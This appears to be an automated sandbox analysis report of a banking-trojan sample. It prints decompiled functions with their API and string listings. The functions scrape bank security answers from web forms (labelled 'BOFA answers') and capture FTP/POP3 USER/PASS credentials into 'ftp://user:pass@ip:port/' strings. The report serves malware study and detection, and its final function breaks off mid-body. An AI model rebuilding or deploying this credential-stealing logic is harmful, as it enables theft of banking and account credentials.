        • Opcode Fuzzy Hash: ead2044e914ad227abff8d213b2a3b49334e44607f3eaf238978758788b6d24c
        • Instruction Fuzzy Hash: F7C17971608341AFD710DF64C884E6BBBE9EFC8308F04896EF485AB291D279DD058F66
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 88%
        			E0040E312(long _a4) {
        				void _v8;
        				void _v60;
        				void _v1084;
        				void* __ebx;
        				void* __edi;
        				char* _t62;
        				char* _t67;
        				int _t73;
        				intOrPtr _t78;
        				intOrPtr _t82;
        				void* _t101;
        				signed int _t103;
        				char* _t108;
        				void* _t109;
        				char* _t110;
        				char** _t113;
        
        				E00412C4A();
        				_t113 = _a4;
        				_t113[3] = 0;
        				_t113[1][8] = InternetOpenA( *0x4155d4, 0, 0, 0, 0);
        				_t62 = _t113[1];
        				_t101 = _t62[8];
        				if(_t101 == 0) {
        					L19:
        					return _t62;
        				}
        				_t113[1][0xc] = InternetConnectA(_t101, _t113[2][0x10], _t113[2][0x18] & 0x0000ffff, 0, 0, 3, 0, 0);
        				_t62 = _t113[1];
        				if(_t62[0xc] == 0) {
        					goto L19;
        				}
        				_push(_t109);
        				_t110 = E0040C7A9(0,  *_t113, _t109, _t113[2][0x2c]);
        				_t67 = _t113[2];
        				if(_t67[0xc] != 4) {
        					_t103 = 0;
        				} else {
        					_t103 = 0x800000;
        				}
        				_t108 = _t110;
        				if(_t110 == 0) {
        					_t108 = _t67[0x2c];
        				}
        				_t113[1][0x10] = HttpOpenRequestA(_t113[1][0xc],  &(( *_t113)[0x404]), _t108, 0,  *_t113, 0, _t103 | 0x8004f200, 0);
        				E0040F15E(_t110);
        				_t73 = _t113[1];
        				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
        					_a4 = 0x31;
        					if(HttpQueryInfoA(( *_t113)[0x420], 0x80000001,  &_v60,  &_a4, 0) == 0 || _a4 == 0) {
        						_t78 =  *0x414ad4; // 0x241f5a8
        						 *0x414dd8( &_v60,  *((intOrPtr*)(_t78 + 0x128)));
        					}
        					_t82 =  *0x414ad4; // 0x241f5a8
        					wnsprintfA( &_v1084, 0x3ff,  *(_t82 + 0x12c),  &_v60,  *0x414d10);
        					HttpAddRequestHeadersA(_t113[1][0x10],  &_v1084, 0xffffffff, 0xa0000000);
        					InternetSetStatusCallback(_t113[1][0x10], E0040E2C9);
        					_t73 = HttpSendRequestA(_t113[1][0x10], 0, 0, ( *_t113)[0x418], ( *_t113)[0x41c]);
        					if(_t73 != 0) {
        						_a4 = 4;
        						_v8 = 0;
        						_t73 = HttpQueryInfoA(_t113[1][0x10], 0x20000013,  &_v8,  &_a4, 0);
        						if(_t73 != 0 && _v8 == 0xc8) {
        							_a4 = 0x3ff;
        							_t73 = InternetQueryOptionA(_t113[1][0x10], 0x22,  &_v1084,  &_a4);
        							if(_t73 != 0 && _a4 > 5) {
        								_t73 = E0040D472( &_v1084, _a4);
        							}
        							_t113[3] = 1;
        						}
        					}
        				}
        				return _t73;
        			}

        APIs
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040E334
        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E360
          • Part of subcall function 0040C7A9: lstrcpy.KERNEL32(00000001,?), ref: 0040C830
        • HttpOpenRequestA.WININET(00000004,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0040E3BD
        • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040E3F8
        • lstrcpy.KERNEL32(?,?), ref: 0040E416
        • wnsprintfA.SHLWAPI ref: 0040E43E
        • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0040E45B
        • InternetSetStatusCallback.WININET(?,Function_0000E2C9), ref: 0040E46C
        • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 0040E488
        • HttpQueryInfoA.WININET(?,20000013,?,00000031,00000000), ref: 0040E4B0
        • InternetQueryOptionA.WININET(?,00000022,?,00000004), ref: 0040E4D9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Http$Internet$QueryRequest$InfoOpenlstrcpy$CallbackConnectHeadersOptionSendStatuswnsprintf
        • String ID: 1
        • API String ID: 1779409970-2212294583
        • Opcode ID: 5c1c5d03e7af52288e2152c0f95b010bc506728b7939cea5624a15ade6595df0
        • Instruction ID: bcb5a542184bdc6cd9399a3e405025aeb52da0a50a59e3903fa66fa8e49580a7
        • Opcode Fuzzy Hash: 5c1c5d03e7af52288e2152c0f95b010bc506728b7939cea5624a15ade6595df0
        • Instruction Fuzzy Hash: 275158B1500208AFDB20DF95DC84E9ABBF9EF48744B01847AF659972A1C734ED90CB68
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E6EC
        • ResetEvent.KERNEL32(?), ref: 0040E71A
        • SetEvent.KERNEL32(?), ref: 0040E75C
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E763
        • InternetQueryOptionA.WININET(?,0000002D,00000000,?), ref: 0040E78C
        • InternetSetOptionA.WININET(?,0000002D,00000000,00000004), ref: 0040E7A2
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E7AF
        • InternetReadFile.WININET(?,?,?,?), ref: 0040E7C7
        • InternetReadFileExA.WININET(?,?,?,?), ref: 0040E7E1
        • InternetReadFileExW.WININET(?,?,?,?), ref: 0040E7F5
        • InternetQueryDataAvailable.WININET(?,?,?,?), ref: 0040E803
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Internet$CriticalFileReadSection$EventLeaveOptionQuery$AvailableDataEnterReset
        • String ID: essAsUserA
        • API String ID: 830436639-2345198579
        • Opcode ID: 3f4d1e09826d968525983d0e2231fffbfa76bbd889cc058636a3e7833fac8513
        • Instruction ID: 95cd27109e6c7b157856d299dcac923864d27704287419ea295d8ff10f261555
        • Opcode Fuzzy Hash: 3f4d1e09826d968525983d0e2231fffbfa76bbd889cc058636a3e7833fac8513
        • Instruction Fuzzy Hash: 37417B72400209BFDF129F51DC48AEA7F76FF88350F248426F915662A1C379D9A1EB98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040C849(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
        				char _v8;
        				signed int _v9;
        				char _v16;
        				char* _v20;
        				char* _v24;
        				signed int _v28;
        				signed int _v32;
        				void* _v36;
        				char* _v40;
        				char _v1064;
        				void* _t127;
        				void* _t132;
        				char _t134;
        				signed int _t144;
        				char _t145;
        				signed int _t157;
        				char _t158;
        				char* _t159;
        				char* _t163;
        				signed int _t168;
        				intOrPtr _t169;
        				char* _t170;
        				intOrPtr _t173;
        				int _t175;
        				signed int _t178;
        				void* _t180;
        				intOrPtr _t182;
        				intOrPtr _t183;
        				intOrPtr _t186;
        				intOrPtr _t187;
        				intOrPtr _t190;
        				intOrPtr _t191;
        				void* _t193;
        				intOrPtr _t194;
        				intOrPtr* _t196;
        				char* _t197;
        				char* _t198;
        				char _t199;
        				intOrPtr _t201;
        				intOrPtr _t203;
        				void* _t216;
        				void* _t219;
        				void* _t223;
        				void* _t224;
        				void* _t226;
        				char _t227;
        				char* _t228;
        				void* _t230;
        				intOrPtr* _t233;
        				void* _t234;
        				intOrPtr _t235;
        				intOrPtr* _t236;
        				char* _t237;
        				signed int _t238;
        				void* _t239;
        				void* _t240;
        
        				_t230 = __esi;
        				_t219 = __edi;
        				_t193 = __ebx;
        				 *0x414dd8( &_v1064, _a4);
        				_t127 = E0040F637( &_v1064);
        				while(1) {
        					_t127 = _t127 - 1;
        					if(_t127 == 0) {
        						break;
        					}
        					if( *((char*)(_t239 + _t127 - 0x424)) != 0x2f) {
        						continue;
        					}
        					_t201 =  *0x414ad4; // 0x241f5a8
        					 *0x414dd8(_t239 + _t127 - 0x423,  *((intOrPtr*)(_t201 + 0x150)), _t219);
        					E00412C4A();
        					_t132 = InternetOpenA( *0x4155d4, 0, 0, 0, 0);
        					if(_t132 == 0 || InternetOpenUrlA(_t132,  &_v1064, 0, 0, 0x84043300, 0) == 0) {
        						L95:
        						break;
        					} else {
        						_push(_t230);
        						_t134 = E004070A8( &_v1064,  &_v36, 0xffff, _t133);
        						_v8 = _t134;
        						if(_t134 == 0) {
        							L94:
        							goto L95;
        						}
        						_t233 = _v36;
        						_push(_t193);
        						_t194 = 0;
        						_t216 = 0;
        						_t223 = "*<select " - _t233;
        						do {
        							_t203 =  *((intOrPtr*)(_t223 + _t233));
        							if(_t203 - 0x41 <= 0x19) {
        								_t203 = _t203 + 0x20;
        							}
        							if(_t203 != 0x23) {
        								__eflags = _t203 - 0x2a;
        								if(_t203 == 0x2a) {
        									_t16 = _t216 + 1; // 0x1
        									__eflags = _t16 - 9;
        									if(__eflags != 0) {
        										__eflags = _t194 - _v8;
        										if(_t194 >= _v8) {
        											goto L93;
        										}
        										_t224 = 8;
        										_t225 = _t224 - _t216;
        										__eflags = _t224 - _t216;
        										_t20 = _t216 +  &M00403E95; // 0x403e95
        										_t234 = _t20;
        										while(1) {
        											_t144 = E0040A3D4(_t234, _t225, _v36 + _t194, _v8 - _t194,  &_v16, 0, 0);
        											__eflags = _t144;
        											if(_t144 != 0) {
        												break;
        											}
        											_t194 = _t194 + 1;
        											__eflags = _t194 - _v8;
        											if(_t194 < _v8) {
        												continue;
        											}
        											goto L93;
        										}
        										_t25 =  &_v16;
        										 *_t25 = _v16 + _t194;
        										__eflags =  *_t25;
        										L28:
        										_t145 = _v16;
        										_v28 = _v28 & 0x00000000;
        										_v32 = _v32 & 0x00000000;
        										_v8 = _v8 - _t145;
        										_t196 = _t145 + _v36;
        										_v9 = 0;
        										do {
        											_v20 = "*<option  selected";
        											_t235 = 0;
        											_t226 = 0;
        											_v20 = _v20 - _t196;
        											_t218 = _t196;
        											do {
        												_t206 = _v20[_t218];
        												if(_t206 - 0x41 <= 0x19) {
        													_t206 = _t206 + 0x20;
        												}
        												if(_t206 != 0x23) {
        													__eflags = _t206 - 0x2a;
        													if(_t206 == 0x2a) {
        														_t44 = _t226 + 1; // 0x1
        														__eflags = _t44 - 0x12;
        														if(__eflags != 0) {
        															__eflags = _t235 - _v8;
        															if(__eflags >= 0) {
        																goto L91;
        															}
        															_v20 = 0x11;
        															_t49 =  &_v20;
        															 *_t49 = _v20 - _t226;
        															__eflags =  *_t49;
        															_t51 = _t226 +  &M00403EA1; // 0x74706f3c
        															_t227 = _t51;
        															while(1) {
        																_t218 = _v20;
        																_t206 = _t227;
        																_t157 = E0040A3D4(_t227, _v20, _t235 + _t196, _v8 - _t235,  &_v16, 0, 0);
        																__eflags = _t157;
        																if(_t157 != 0) {
        																	break;
        																}
        																_t235 = _t235 + 1;
        																__eflags = _t235 - _v8;
        																if(__eflags < 0) {
        																	continue;
        																}
        																goto L91;
        															}
        															_t57 =  &_v16;
        															 *_t57 = _v16 + _t235;
        															__eflags =  *_t57;
        															L51:
        															_t158 = _v16;
        															_t197 = _t196 + _t158;
        															_t60 =  &_v8;
        															 *_t60 = _v8 - _t158;
        															if( *_t60 == 0) {
        																goto L91;
        															}
        															while( *_t197 != 0x3e) {
        																_t197 = _t197 + 1;
        																_t62 =  &_v8;
        																 *_t62 = _v8 - 1;
        																if( *_t62 != 0) {
        																	continue;
        																}
        																break;
        															}
        															if(_v8 == 0) {
        																goto L91;
        															}
        															_t198 = _t197 + 1;
        															_t206 = _v8 + _t198;
        															_v40 = _t198;
        															_t159 = _t198;
        															if(_t198 >= _t206) {
        																L58:
        																if(_t159 == _t206) {
        																	goto L91;
        																}
        																_t206 = _t159 - _t198;
        																if(_t159 - _t198 > 0x200) {
        																	goto L91;
        																}
        																_v8 = _v8 + _t198 - _t159;
        																_t236 = _t159 + 1;
        																_t228 = 0;
        																_v24 = "*<input *value=\"";
        																_v24 = _v24 - _t236;
        																 *_t159 = 0;
        																_v20 = 0;
        																_t218 = _t236;
        																do {
        																	_t206 = _v24[_t218];
        																	if(_t206 - 0x41 <= 0x19) {
        																		_t206 = _t206 + 0x20;
        																	}
        																	if(_t206 != 0x23) {
        																		__eflags = _t206 - 0x2a;
        																		if(_t206 == 0x2a) {
        																			_t163 = _v20;
        																			_t82 = _t163 + 1; // 0x12
        																			_t206 = _t82;
        																			__eflags = _t82 - 0x10;
        																			if(__eflags != 0) {
        																				__eflags = _t228 - _v8;
        																				if(__eflags >= 0) {
        																					goto L91;
        																				}
        																				_v24 = 0xf;
        																				_t87 =  &_v24;
        																				 *_t87 = _v24 - _t163;
        																				__eflags =  *_t87;
        																				_t89 = _t163 +  &M00403EB5; // 0x403ec6
        																				_t199 = _t89;
        																				while(1) {
        																					_t218 = _v24;
        																					_t206 = _t199;
        																					_t168 = E0040A3D4(_t199, _v24, _t228 + _t236, _v8 - _t228,  &_v16, 0, 0);
        																					__eflags = _t168;
        																					if(_t168 != 0) {
        																						break;
        																					}
        																					_t228 = _t228 + 1;
        																					__eflags = _t228 - _v8;
        																					if(__eflags < 0) {
        																						continue;
        																					}
        																					goto L91;
        																				}
        																				_t95 =  &_v16;
        																				 *_t95 = _v16 + _t228;
        																				__eflags =  *_t95;
        																				_t196 = _v40;
        																				L82:
        																				_t169 = _v16;
        																				_v8 = _v8 - _t169;
        																				_t237 = _t236 + _t169;
        																				_t206 = _v8 + _t237;
        																				_t170 = _t237;
        																				if(_t237 >= _t206) {
        																					L85:
        																					if(_t170 == _t206) {
        																						goto L91;
        																					}
        																					_t206 = _t170 - _t237;
        																					if(_t170 - _t237 > 0x200) {
        																						goto L91;
        																					}
        																					 *_t170 = 0;
        																					_t173 =  *0x414ad4; // 0x241f5a8
        																					_t175 = wnsprintfA( &_v1064, 0x400,  *(_t173 + 0x154), (_v9 & 0x000000ff) + 1, _t196, (_v9 & 0x000000ff) + 1, _t237);
        																					_t229 = _t175;
        																					_t240 = _t240 + 0x1c;
        																					_t238 = _t175 + _v32;
        																					_t178 = E0040F117(_t238 + 0xa, _v28);
        																					if(_t178 == 0) {
        																						E0040F15E(_v28);
        																						_t118 =  &_v32;
        																						 *_t118 = _v32 & 0x00000000;
        																						__eflags =  *_t118;
        																						goto L91;
        																					}
        																					goto L88;
        																				}
        																				while( *_t170 != 0x22) {
        																					_t170 = _t170 + 1;
        																					if(_t170 < _t206) {
        																						continue;
        																					}
        																					goto L85;
        																				}
        																				goto L85;
        																			}
        																			_v16 = _v8;
        																			goto L82;
        																		}
        																		_t182 =  *_t218;
        																		__eflags = _t182 - 0x41;
        																		if(_t182 < 0x41) {
        																			L70:
        																			_t183 = _t182;
        																			L71:
        																			__eflags = _t206 - _t183;
        																			if(__eflags != 0) {
        																				goto L91;
        																			}
        																			goto L72;
        																		}
        																		__eflags = _t182 - 0x5a;
        																		if(_t182 > 0x5a) {
        																			goto L70;
        																		}
        																		_t183 = _t182 + 0x20;
        																		goto L71;
        																	} else {
        																		if(_t228 == _v8) {
        																			goto L91;
        																		}
        																	}
        																	L72:
        																	_t228 = _t228 + 1;
        																	_t218 = _t218 + 1;
        																	_v20 =  &(_v20[1]);
        																} while (_v20 != 0x10);
        																_v16 = _t228;
        																goto L82;
        															}
        															while( *_t159 != 0x3c) {
        																_t159 = _t159 + 1;
        																if(_t159 < _t206) {
        																	continue;
        																}
        																goto L58;
        															}
        															goto L58;
        														}
        														_v16 = _v8;
        														goto L51;
        													}
        													_t186 =  *_t218;
        													__eflags = _t186 - 0x41;
        													if(_t186 < 0x41) {
        														L39:
        														_t187 = _t186;
        														L40:
        														__eflags = _t206 - _t187;
        														if(__eflags != 0) {
        															goto L91;
        														}
        														goto L41;
        													}
        													__eflags = _t186 - 0x5a;
        													if(_t186 > 0x5a) {
        														goto L39;
        													}
        													_t187 = _t186 + 0x20;
        													goto L40;
        												} else {
        													if(_t235 == _v8) {
        														L91:
        														_t282 = _v32;
        														if(_v32 != 0) {
        															E0041352B(_t206, _t218, _t282, 0xc9, 0, 0, L"BOFA answers:\n\n%S", _v28);
        															E0040F15E(_v28);
        														}
        														goto L93;
        													}
        												}
        												L41:
        												_t235 = _t235 + 1;
        												_t218 = _t218 + 1;
        												_t226 = _t226 + 1;
        											} while (_t226 != 0x12);
        											_v16 = _t235;
        											goto L51;
        											L88:
        											_t206 = _v32 + _t178;
        											_v28 = _t178;
        											_t180 = E0040F19A(_v32 + _t178,  &_v1064, _t229);
        											_v9 = _v9 + 1;
        											_v32 = _t238;
        											 *((char*)(_t180 + _t238)) = 0;
        										} while (_v9 < 3);
        										goto L91;
        									}
        									_v16 = _v8;
        									goto L28;
        								}
        								_t190 =  *_t233;
        								__eflags = _t190 - 0x41;
        								if(_t190 < 0x41) {
        									L16:
        									_t191 = _t190;
        									L17:
        									__eflags = _t203 - _t191;
        									if(__eflags != 0) {
        										goto L93;
        									}
        									goto L18;
        								}
        								__eflags = _t190 - 0x5a;
        								if(_t190 > 0x5a) {
        									goto L16;
        								}
        								_t191 = _t190 + 0x20;
        								goto L17;
        							} else {
        								if(_t194 == _v8) {
        									L93:
        									E0040F15E(_v36);
        									goto L94;
        								}
        							}
        							L18:
        							_t194 = _t194 + 1;
        							_t233 = _t233 + 1;
        							_t216 = _t216 + 1;
        						} while (_t216 != 9);
        						_v16 = _t194;
        						goto L28;
        					}
        				}
        				return E0040F15E(_a4);
        			}

        APIs
        • lstrcpy.KERNEL32(?,?), ref: 0040C85C
        • lstrcpy.KERNEL32(?,?), ref: 0040C893
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040C8AA
        • InternetOpenUrlA.WININET(00000000,0000002F,00000000,00000000,84043300,00000000), ref: 0040C8C8
        • wnsprintfA.SHLWAPI ref: 0040CBED
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: InternetOpenlstrcpy$wnsprintf
        • String ID: *<input *value="$*<option selected$*<select $/$BOFA answers:%S
        • API String ID: 3861095738-10845715
        • Opcode ID: fdb31d928b95f54613987c246785e205f709c1e53995c341fb2ef0808bfd3406
        • Instruction ID: f1905f83d06502bd7186ba75528ab9a8b5b1ff8d47bcde2f7127104675654e2c
        • Opcode Fuzzy Hash: fdb31d928b95f54613987c246785e205f709c1e53995c341fb2ef0808bfd3406
        • Instruction Fuzzy Hash: 9CD1AE71E04109EBDF24CFA9C9C5BEEBBB5EB45300F14427BD506B7281C6386E468B59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E0040ED1A(void* __eax, int _a4, int _a8) {
        				int _v24;
        				signed char _v28;
        				signed char _v29;
        				signed char _v30;
        				signed char _v31;
        				signed int _v32;
        				signed int _v34;
        				int _v36;
        				char _v37;
        				char _v49;
        				void* __esi;
        				int _t74;
        				void* _t75;
        				intOrPtr _t76;
        				int _t82;
        				int _t85;
        				int _t97;
        				int _t99;
        				int _t101;
        				int _t103;
        				int _t105;
        				int _t107;
        				void* _t108;
        				int _t109;
        				int _t116;
        				int _t127;
        				signed int _t128;
        				char* _t133;
        				intOrPtr _t134;
        				int _t140;
        				int _t147;
        				int _t149;
        				intOrPtr _t151;
        				int _t154;
        				int _t157;
        
        				_t74 = __eax;
        				_t149 = _a8;
        				_t154 = __eax;
        				if(( *0x414be8 & 0x00000002) == 0) {
        					L3:
        					__eflags = _t149 - 3;
        					if(_t149 < 3) {
        						L73:
        						return _t74;
        					}
        					__eflags = _t154;
        					if(_t154 == 0) {
        						goto L73;
        					}
        					__eflags = _a4;
        					if(_a4 == 0) {
        						goto L73;
        					}
        					_t75 =  *_t154;
        					_v28 = 0;
        					_v32 = 0;
        					__eflags = _t75 - 0x55;
        					if(_t75 != 0x55) {
        						L12:
        						__eflags = _t75 - 0x50;
        						if(_t75 != 0x50) {
        							while(1) {
        								L41:
        								__eflags = _t149 - 1;
        								if(_t149 <= 1) {
        									break;
        								}
        								_t76 =  *((intOrPtr*)(_t154 + _t149 - 1));
        								__eflags = _t76 - 0xd;
        								if(_t76 == 0xd) {
        									L40:
        									_t149 = _t149 - 1;
        									__eflags = _t149;
        									continue;
        								}
        								__eflags = _t76 - 0xa;
        								if(_t76 != 0xa) {
        									break;
        								}
        								goto L40;
        							}
        							_t74 = _t149 - 3;
        							__eflags = _t74 - 1;
        							if(_t74 > 1) {
        								goto L73;
        							}
        							 *0x414ed8("urityDescriptorToAccessNamedA");
        							_t127 = E0040EBE3(_a4);
        							_v32 = _t127;
        							__eflags = _t127;
        							if(_t127 == 0) {
        								L72:
        								_t74 =  *0x414edc("urityDescriptorToAccessNamedA");
        								goto L73;
        							}
        							__eflags =  *(_t127 + 4);
        							if( *(_t127 + 4) == 0) {
        								L70:
        								_push(0);
        								L71:
        								E0040EC78(_t127);
        								goto L72;
        							}
        							__eflags =  *(_t127 + 8);
        							if( *(_t127 + 8) == 0) {
        								goto L70;
        							}
        							__eflags = _t149 - 3;
        							if(_t149 != 3) {
        								_t128 = 4;
        								__eflags = _t149 - _t128;
        								if(_t149 != _t128) {
        									goto L72;
        								}
        								_t151 =  *0x414ad4; // 0x241f5a8
        								_t141 = _t128;
        								_t82 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x134)));
        								__eflags = _t82;
        								if(_t82 == 0) {
        									L56:
        									_v37 = 1;
        									L60:
        									_t127 = _v28;
        									L61:
        									_v28 = 0x10;
        									_t85 =  *0x414cc0(_a4,  &_v24,  &_v28);
        									__eflags = _t85;
        									if(_t85 != 0) {
        										L65:
        										__eflags = _v49 - 2;
        										if(_v49 != 2) {
        											L68:
        											_push(0);
        											goto L71;
        										}
        										_t133 = "pop3";
        										L67:
        										_push((_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008);
        										_push(_v29 & 0x000000ff);
        										_push(_v30 & 0x000000ff);
        										_push(_v31 & 0x000000ff);
        										_push(_v32 & 0x000000ff);
        										_push( *(_t127 + 8));
        										_push( *(_t127 + 4));
        										__eflags = _v49 - 1;
        										__eflags = (_v49 != 1) + 0x64;
        										E0041352B(_t133, (_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008, (_v49 != 1) + 0x64, (_v49 != 1) + 0x64, 0, 0, L"%S://%S:%S@%u.%u.%u.%u:%u/", _t133);
        										goto L68;
        									}
        									_t97 = E004070F0( &_v36);
        									__eflags = _t97;
        									if(_t97 != 0) {
        										goto L65;
        									}
        									__eflags = _v49 - 1;
        									if(_v49 != 1) {
        										goto L65;
        									}
        									_t134 =  *0x414ad4; // 0x241f5a8
        									_t99 = E0040F65D(_t141 | 0xffffffff,  *((intOrPtr*)(_t134 + 0x148)), _t141 | 0xffffffff,  *(_t127 + 4));
        									__eflags = _t99;
        									if(_t99 != 0) {
        										_t133 = "ftp";
        										goto L67;
        									}
        									goto L65;
        								}
        								_t141 = _t128;
        								_t101 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x138)));
        								__eflags = _t101;
        								if(_t101 == 0) {
        									goto L56;
        								}
        								_t141 = _t128;
        								_t103 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x13c)));
        								__eflags = _t103;
        								if(_t103 != 0) {
        									_t141 = _t128;
        									_t105 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x140)));
        									__eflags = _t105;
        									if(_t105 == 0) {
        										L59:
        										_v37 = 2;
        										goto L60;
        									}
        									_t141 = _t128;
        									_t107 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x144)));
        									__eflags = _t107;
        									if(_t107 != 0) {
        										goto L72;
        									}
        									goto L59;
        								}
        								goto L56;
        							}
        							_t108 =  *_t154;
        							__eflags = _t108 - 0x43;
        							if(_t108 == 0x43) {
        								L49:
        								__eflags =  *((char*)(_t154 + 1)) - 0x57;
        								if( *((char*)(_t154 + 1)) != 0x57) {
        									goto L72;
        								}
        								__eflags =  *((char*)(_t154 + 2)) - 0x44;
        								if( *((char*)(_t154 + 2)) != 0x44) {
        									goto L72;
        								}
        								_v37 = 1;
        								goto L61;
        							}
        							__eflags = _t108 - 0x50;
        							if(_t108 != 0x50) {
        								goto L72;
        							}
        							goto L49;
        						}
        						__eflags =  *((char*)(_t154 + 1)) - 0x41;
        						if( *((char*)(_t154 + 1)) != 0x41) {
        							goto L41;
        						}
        						__eflags =  *((char*)(_t154 + 2)) - 0x53;
        						if( *((char*)(_t154 + 2)) != 0x53) {
        							goto L41;
        						}
        						__eflags =  *((char*)(_t154 + 3)) - 0x53;
        						if( *((char*)(_t154 + 3)) != 0x53) {
        							goto L41;
        						}
        						__eflags =  *((char*)(_t154 + 4)) - 0x20;
        						if( *((char*)(_t154 + 4)) != 0x20) {
        							goto L41;
        						} else {
        							_v28 = 5;
        							L18:
        							_t18 = _t149 - _v32 + 1; // 0x6
        							_t74 = _t18;
        							__eflags = _t74;
        							if(_t74 == 0) {
        								goto L73;
        							}
        							_t74 = E0040F14B(_t74);
        							_t147 = _t74;
        							_v24 = _t147;
        							__eflags = _t147;
        							if(_t147 == 0) {
        								goto L73;
        							}
        							_t140 = _v32;
        							__eflags = _t140;
        							if(_t140 == 0) {
        								_t140 = _v28;
        							}
        							while(1) {
        								__eflags = _t140 - _t149;
        								if(_t140 >= _t149) {
        									break;
        								}
        								_t109 =  *((intOrPtr*)(_t140 + _t154));
        								__eflags = _t109 - 0xa;
        								if(_t109 != 0xa) {
        									__eflags = _t109 - 0xd;
        									if(_t109 != 0xd) {
        										__eflags = _t109;
        										if(_t109 != 0) {
        											 *_t147 = _t109;
        										}
        									}
        								}
        								_t140 = _t140 + 1;
        								_t147 = _t147 + 1;
        								__eflags = _t147;
        							}
        							 *0x414ed8(0x414f80);
        							__eflags = _v36;
        							if(_v36 == 0) {
        								__eflags = _v32;
        								if(_v32 == 0) {
        									L37:
        									 *0x414edc(0x414f80);
        									_t74 = E0040F15E(_v32);
        									goto L73;
        								}
        								_t157 = E0040EBE3(_a4);
        								__eflags = _t157;
        								if(_t157 == 0) {
        									goto L37;
        								}
        								E0040F15E( *(_t157 + 8));
        								__eflags = _a8 - _v36;
        								_t116 = E0040F346(_a8 - _v36, _v32);
        								 *(_t157 + 8) = _t116;
        								L35:
        								__eflags = _t116;
        								if(_t116 == 0) {
        									E0040EC78(_t157, _t116);
        								}
        								goto L37;
        							}
        							_t157 = E0040EBE3(_a4);
        							__eflags = _t157;
        							if(_t157 != 0) {
        								L31:
        								E0040EC78(_t157, 1);
        								 *_t157 = _a4;
        								_t116 = E0040F346(_t130, _v32);
        								 *(_t157 + 4) = _t116;
        								goto L35;
        							}
        							_t157 = E0040EC1B(_a4);
        							__eflags = _t157;
        							if(_t157 == 0) {
        								goto L37;
        							}
        							goto L31;
        						}
        					}
        					__eflags =  *((char*)(_t154 + 1)) - 0x53;
        					if( *((char*)(_t154 + 1)) != 0x53) {
        						goto L12;
        					}
        					__eflags =  *((char*)(_t154 + 2)) - 0x45;
        					if( *((char*)(_t154 + 2)) != 0x45) {
        						goto L12;
        					}
        					__eflags =  *((char*)(_t154 + 3)) - 0x52;
        					if( *((char*)(_t154 + 3)) != 0x52) {
        						goto L12;
        					}
        					__eflags =  *((char*)(_t154 + 4)) - 0x20;
        					if( *((char*)(_t154 + 4)) != 0x20) {
        						goto L12;
        					} else {
        						_v32 = 5;
        						goto L18;
        					}
        				}
        				_t74 = IsBadHugeWritePtr(__eax, _t149);
        				if(_t74 != 0) {
        					goto L3;
        				} else {
        					_t74 = E0040F21C(E004102A8(0xff, _t74), _t154, _t124, _t149);
        					goto L73;
        				}
        			}

        APIs
        • IsBadHugeWritePtr.KERNEL32(?,?), ref: 0040ED36
        • RtlEnterCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040EE2B
        • RtlLeaveCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040EEAB
        • RtlEnterCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040EEE2
        • getpeername.WS2_32(?), ref: 0040EFE6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$Enter$HugeLeaveWritegetpeername
        • String ID: %S://%S:%S@%u.%u.%u.%u:%u/$ftp$pop3$urityDescriptorToAccessNamedA
        • API String ID: 133427328-87512144
        • Opcode ID: 5e21e6b6098d9f9c1f66258109cca9bfe7fc1be98db8c0fd26430172c7f4dc84
        • Instruction ID: c45227c53a66f3d5ee494d19b5b3ef10ee3ed3861093dfebd9bc617ab7814880
        • Opcode Fuzzy Hash: 5e21e6b6098d9f9c1f66258109cca9bfe7fc1be98db8c0fd26430172c7f4dc84
        • Instruction Fuzzy Hash: 43A113306083429ADB309E26C84076BBBD16F85304F04883FF985B66D2D73DDD9AD79A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00405E39(WCHAR** __eax, WCHAR* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
        				signed int _v8;
        				WCHAR* _v12;
        				short _v532;
        				WCHAR* _t21;
        				WCHAR* _t24;
        				int _t25;
        				int _t40;
        				void* _t43;
        				signed int _t45;
        				WCHAR** _t47;
        
        				_t42 = __ecx;
        				_v8 = _v8 | 0xffffffff;
        				_push(L"\\??\\");
        				_t43 = 4;
        				_t47 = __eax;
        				_t41 = __ecx;
        				if(E0040F6F6(_t43, __ecx, _t43) == 0) {
        					_t41 = __ecx + 8;
        				}
